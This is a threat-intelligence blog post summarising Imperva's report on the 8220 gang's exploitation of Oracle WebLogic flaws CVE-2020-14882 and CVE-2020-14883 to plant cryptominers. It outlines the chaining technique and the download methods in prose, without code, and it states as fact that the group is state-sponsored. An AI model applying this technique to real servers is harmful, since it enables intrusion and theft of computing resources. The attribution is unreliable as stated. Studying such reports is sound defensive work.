In a recent report published on December 14th, 2023, cybersecurity leader Imperva shed light on a series of attacks exploiting vulnerabilities in Oracle WebLogic servers. Imperva’s Threat Research team detected increased activity from a Chinese state-sponsored group known as the 8220 gang, targeting WebLogic installations to deploy cryptojacking malware.
First spotted in 2017, the 8220 gang is notorious for mass malware campaigns that abuse new vulnerabilities as they are discovered. Their latest campaigns take advantage of authentication flaws and remote code execution bugs in WebLogic to breach servers and install Monero miners.
Imperva’s report contains valuable details about the attack vectors utilized by 8220, as well as indicators of compromise that can help organizations detect intrusions. We will examine the specific WebLogic vulnerabilities exploited, the techniques employed to compromise systems, and the malware installed to steal compute resources for illicit cryptocurrency mining. Understanding these latest cyber threats is the first step toward protecting critical infrastructure.
Table of Contents
A Short Note About the 8220 Gang
The 8220 gang, named after the port number frequently used in its campaigns, has been actively exploiting vulnerabilities to distribute cryptojacking malware since 2017. Security researchers attribute the group to Chinese state-sponsored hackers based on tactics, tools, and procedures.
Early operations targeted popular platforms like Drupal, Hadoop YARN, and Apache Struts, compromising systems to mine Monero. The group continues relying on recently disclosed bugs to breach servers from various manufacturers, including Oracle WebLogic, VMware, Redis, and Atlassian Confluence.
Once inside the network, the gang uses living-off-the-land binaries to move laterally and escalate privileges. A vast toolkit enables them to fingerprint systems, exploit additional weaknesses, and evade detection. Payloads often include coin miners tailored to the compromised architecture, configuration scripts, and backdoors for persistent access.
While the 8220 gang prioritizes stealth over destruction, the constant evolution of techniques makes them unpredictable and dangerous. Their operations generate substantial illicit profits through the theft of compute resources. Understanding this threat actor is key to protecting internet-facing infrastructure from server takeovers.
Vulnerabilities Found Being Exploited Oracle WebLogic Servers
Imperva’s report details two critical Oracle WebLogic vulnerabilities chained together by the 8220 gang to achieve full remote code execution:
- CVE-2020-14883 – This flaw allows an authenticated attacker to send crafted input to execute arbitrary system commands. The bug exists in a component that handles administrative operations.
- CVE-2020-14882 – This flaw enables unauthenticated attackers to bypass authentication by sending maliciously crafted requests. Combining it with the previous RCE issue effectively eliminates the authentication requirement.
By chaining these two vulnerabilities, the 8220 gang can compromise Oracle WebLogic servers without needing any credentials. The attack flow involves sending HTTP requests to trigger CVE-2020-14882 and bypass auth first. Next, another request executes arbitrary code through CVE-2020-14883 to install malware.
These chained exploits enable the group to breach servers en masse with little effort. Organizations running vulnerable Oracle WebLogic installations are prime targets, especially those with internet-facing systems. Applying the latest security patches closes these exploitation vectors.
The 8220 gang has been exploiting vulnerabilities, specifically focusing on their methods and the nature of the vulnerabilities they target. Here’s a breakdown of the key technical details:
Method of Exploitation of CVE-2020-14883 & CVE-2020-14882 (Image Source: Imperva)
- The gang uses two different gadget chains for their attacks. One of these enables the loading of an XML file, which then contains a call to the other, enabling command execution on the operating system (OS).
- Different XML variations are used depending on the target OS. For Linux hosts, they attempt to download second-phase files using various methods such as cURL, wget, lwp-download, python urllib (base64 encoded), and a custom base64 encoded bash function.
- For Windows hosts, they use a simple PowerShell WebClient command to execute a downloaded PowerShell script.
- In another attack variant, they use a different gadget chain to execute Java code directly, without needing an externally hosted XML file. This injected Java code first determines the OS (Windows or Linux) and then executes the appropriate command strings.
Victims of Attack Campaign
According to Imperva’s telemetry, the 8220 gang does not focus on specific industries or countries when carrying out attacks. Recent campaigns have targeted healthcare, telecommunications, and financial services organizations in various regions like the United States, South Africa, Spain, Colombia, and Mexico.
The actors appear opportunistic in selecting which vulnerable WebLogic servers to exploit, lacking a defined targeting pattern. Any organization regardless of size or sector running outdated Oracle software is at potential risk. This demonstrates the importance of prompt patching and layered security controls to mitigate threats.
By taking advantage of any unpatched server they can compromise to deploy coin miners, the 8220 gang casts a wide net harvesting precious compute resources. Their broad attacks affect entities across both public and private sectors globally.
The 8220 gang exemplifies how threat actors now rapidly adopt innovations to outpace legacy defenses. Organizations must embrace emerging technologies like automation alongside pragmatic security to manage vulnerabilities proactively. Defending against persistent threats demands resilience through multi-layered monitoring, coordinated response, and machine-speed adaptation.
We hope this post helps you know about the new cyber attacks on Oracle WebLogic Servers. Please share this post and help secure the digital world.Visit our website thesecmaster.com, and our social media page on Facebook, LinkedIn, Twitter, Telegram, Tumblr, Medium, and Instagram and subscribe to receive updates like this.